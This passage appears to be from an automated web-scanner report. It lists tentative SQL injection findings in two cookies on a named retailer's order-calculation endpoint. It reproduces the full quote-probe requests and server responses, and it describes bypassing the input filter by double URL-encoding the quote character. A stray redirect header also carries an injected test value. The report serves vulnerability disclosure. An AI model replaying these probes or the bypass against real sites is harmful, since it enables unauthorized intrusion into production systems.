Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705475022596066&data3=0&sid=1889&c=1%27%27%3D1
Vary: Accept-Encoding
Content-Length: 2736
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:50 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.65. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [Coradiantuserid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The Coradiantuserid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Coradiantuserid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026'; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:56:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:56:07 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225362328%3a%3bC25%5fEXP%3d1360065362%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:56:02 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225362328%3a%3bC25%5fEXP%3d1360065362%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:56:03 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22169%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24237%2c431%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310817363%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225362328%3a%3bC25%5fEXP%3d1360065362%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:56:03 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228963144%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ctyx2oY352axv5qf75fxp0zq43Ck%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026''; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:56:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:56:08 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225367982%3a%3bC25%5fEXP%3d1360065367%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:56:07 GMT;Path=/


1.66. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [RES_TRACKINGID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The RES_TRACKINGID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the RES_TRACKINGID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the RES_TRACKINGID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388%2527; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Expires: Thu, 16 Jun 2011 12:05:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:05:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225936626%3a%3bC25%5fEXP%3d1360065936%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:05:36 GMT;Path=/
Set-Cookie: WC_PERSISTENT=ms8azYnsw2wEElsVhU3vMb27om8%3d%0a%3b2011%2d06%2d16+08%3a05%3a36%2e628%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:09:04 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308229536628%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cIyrrsZiSciFarvpfmb5Ol137PrA%3d;Domain=.homedepot.com;Path=/
Content-Length: 285322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">


...[SNIP]...
<a href="http://www.homedepot.com/webapp/wcs/stores/servlet/THDStoreFinder?storeId=10051&URL=StoreFinderViewDetails&errorViewName=StoreFinderView&headerStoreFinder=&List=List&catalogId=10053&zip='+ getTHDStoreZip() + '&distance_1=50&city=&state_1=&distance_2=50&store=" class="storeFinder-dropdwn" onclick="s_objectID=\'He
...[SNIP]...
e;
            // Modified for Requirement THD_WCS_009 - Commented the below line
            //document.getElementById(editZipFormId).submit();            
        }
           }
           else {
               alert('Invalid Zip Code');
        // Added below 2 lines for Requirement THD_WCS_009 - Start
               busy = false;
               return false;                
           }
       }
       busy = false;
    // Added below line for Requirement THD_
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
